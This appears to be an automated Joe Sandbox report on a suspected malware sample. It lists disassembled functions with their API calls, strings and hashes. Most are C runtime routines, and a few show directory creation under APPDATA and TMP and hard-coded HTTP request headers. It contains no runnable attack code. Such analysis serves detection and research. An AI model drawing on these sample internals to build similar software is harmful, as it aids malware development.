                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                            • _free.LIBCMT ref: 1000A03A
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 1000A05C
                                            • _free.LIBCMT ref: 1000A071
                                            • _free.LIBCMT ref: 1000A07C
                                            • _free.LIBCMT ref: 1000A09E
                                            • _free.LIBCMT ref: 1000A0B1
                                            • _free.LIBCMT ref: 1000A0BF
                                            • _free.LIBCMT ref: 1000A0CA
                                            • _free.LIBCMT ref: 1000A102
                                            • _free.LIBCMT ref: 1000A109
                                            • _free.LIBCMT ref: 1000A126
                                            • _free.LIBCMT ref: 1000A13E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID:
                                            • API String ID: 161543041-0
                                            • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                            • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                            • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                            • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                            Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                            Download Yara Rule
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                            • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                            • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                            • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                            • String ID: APPDATA$TMPDIR
                                            • API String ID: 1838500112-4048745339
                                            • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                            • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                            • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                            Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                            • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                            Strings
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$H_prolog3_
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                            • API String ID: 1254599795-787135837
                                            • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                            • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                            • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                            Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                            • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                            • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                            • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                            Function 0041C38F Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CE8F), ref: 0041C3A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: DecodePointer
                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                            • API String ID: 3527080286-3064271455
                                            • Opcode ID: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction ID: c807006a3b6ff10d3a002f023a5ec1143af0d4f8941b6a10615b45774aafcbb0
                                            • Opcode Fuzzy Hash: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                            • Instruction Fuzzy Hash: A751CC7098422AEBCB108F98ED9C5FE7F71FB05304F908057D480A6664C7BC99A6CB5D
                                            Function 04B3BF22 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 04B3C041
                                            • ___TypeMatch.LIBVCRUNTIME ref: 04B3C14F
                                            • _UnwindNestedFrames.LIBCMT ref: 04B3C2A1
                                            • CallUnexpected.LIBVCRUNTIME ref: 04B3C2BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 4fcd19b84ec876c657071385e29058719d2c3ac9453825a1ed13a401ebca1872
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: A5B15472800209EFDF19DFE6C8809AEBBB5FF04316B14419AE8157B216D735FA61CB91
                                            Function 04CFB0BB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 04CFB1DA
                                            • ___TypeMatch.LIBVCRUNTIME ref: 04CFB2E8
                                            • _UnwindNestedFrames.LIBCMT ref: 04CFB43A
                                            • CallUnexpected.LIBVCRUNTIME ref: 04CFB455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 5a2126afdb599e55cc9f314cc84c8f670f1906fe3e60ef4c28957c9dc03ca9b6
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: 5FB1BA71800209EFCF68DFA4CD809AEBBB6FF04314B14815AEA046B215E739FE15DB91
                                            Function 0040BCBB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 0040BDDA
                                            • ___TypeMatch.LIBVCRUNTIME ref: 0040BEE8
                                            • _UnwindNestedFrames.LIBCMT ref: 0040C03A
                                            • CallUnexpected.LIBVCRUNTIME ref: 0040C055
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 526bd2c442181307887733989819878d768e136a746cf2eec307868f2bd45ee9
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: EEB1477180020AEBCF25DFA5C8819AEBBB5EF04314B14416BE815BB292D738DA51CFDD
                                            Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                            • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                            • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                            • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                            • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                            • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                            • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                            Function 10008F36 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$___from_strstr_to_strchr
                                            • String ID:
                                            • API String ID: 3409252457-0
                                            • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                            • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                            • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                            • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                            Function 04B39E04 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04B39DE2), ref: 04B39E10
                                            • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04B39DE2), ref: 04B39E1B
                                            • GetModuleHandleW.KERNEL32(0042000C,?,?,04B39DE2), ref: 04B39E2C
                                            • GetProcAddress.KERNEL32(00000000,00420028), ref: 04B39E3E
                                            • GetProcAddress.KERNEL32(00000000,00420044), ref: 04B39E4C
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B39DE2), ref: 04B39E6F
                                            • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04B39E8B
                                            • CloseHandle.KERNEL32(0042D060,?,?,04B39DE2), ref: 04B39E9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID:
                                            • API String ID: 2565136772-0
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 3a567856b837b7594b73c571e17b65edb2cdf30ab9c96eab89c2d94b2a56cf6a
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 48017575F40721BBD7205BB5FC09F973AE8EB48B06B604475F905E2161DBB4D80B8A68
                                            Function 04B44033 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction ID: 0c6895258e89afeb62e0691de77013702d7460a1e7dd886deb0faadc7aaef6c4
                                            • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction Fuzzy Hash: 95B16572A00265AFEF118F68CC81BAE7FB5EFD5714F1441E5E904AB281D274B921E7A0
                                            Function 04D031CC Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction ID: 4bc1b78499e8cf9151666e6550f0cfc1c6d1214272a43c5cfa1915dac430e096
                                            • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction Fuzzy Hash: C1B11372A00295AFEB168FA8CC81BAEBBA5FF55314F14C165ED44AF2C1D674F901C7A0
                                            Function 00413DCC Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction ID: 4a21b80fcc43a582202c6f7144ab3ce64f52356938c116e7343db5097d41ee6d
                                            • Opcode Fuzzy Hash: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction Fuzzy Hash: 57B13672E003559FDB118F65CC81BEF7FA5EF59310F14416BE904AB382D2789A82C7A8
                                            Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __RTC_Initialize.LIBCMT ref: 1000291D
                                            • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Initialize___scrt_uninitialize_crt
                                            • String ID:
                                            • API String ID: 2442719207-0
                                            • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                            • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                            Function 04CFABC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 04CFABF7
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 04CFABFF
                                            • _ValidateLocalCookies.LIBCMT ref: 04CFAC88
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 04CFACB3
                                            • _ValidateLocalCookies.LIBCMT ref: 04CFAD08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: a16e463b673d3aa92c2070837d42a8108e391b283d486aeac48eebc019391ff3
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 2941B430A002189BCF50DF68CC84A9EBBB6AF44318F148155EA195B391E73BFA01CB91
                                            Function 0040B7C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B7F7
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B7FF
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B888
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8B3
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B908
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: 0a5d0bd6c222bbdd43f8b319fa79a96d429a9708f3c046b0ae0cbd11a01f7e51
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 11418535A00219DBCF10EF69C885A9EBBA5EF44318F14C17AE8147B3E2D7399905CBD9
                                            Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                            • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                            • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                            • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                            Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 0-537541572
                                            • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                            • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                            Function 00413339 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,00413448,00403597,?,00000000,00402809,0040280B,?,004135C1,00000022,FlsSetValue,00422950,00422958,00402809), ref: 004133FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3664257935-537541572
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 89836d951bc72d4e20e2faa1a52db581b462940ce5fd44a8dff6846afbaeb460
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: A3212731B01214EBDB329F21DC44ADB7B68AB41765B200133ED15A73D1DA78EE46C6DC
                                            Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                            • _free.LIBCMT ref: 1000C60D
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 1000C618
                                            • _free.LIBCMT ref: 1000C623
                                            • _free.LIBCMT ref: 1000C677
                                            • _free.LIBCMT ref: 1000C682
                                            • _free.LIBCMT ref: 1000C68D
                                            • _free.LIBCMT ref: 1000C698
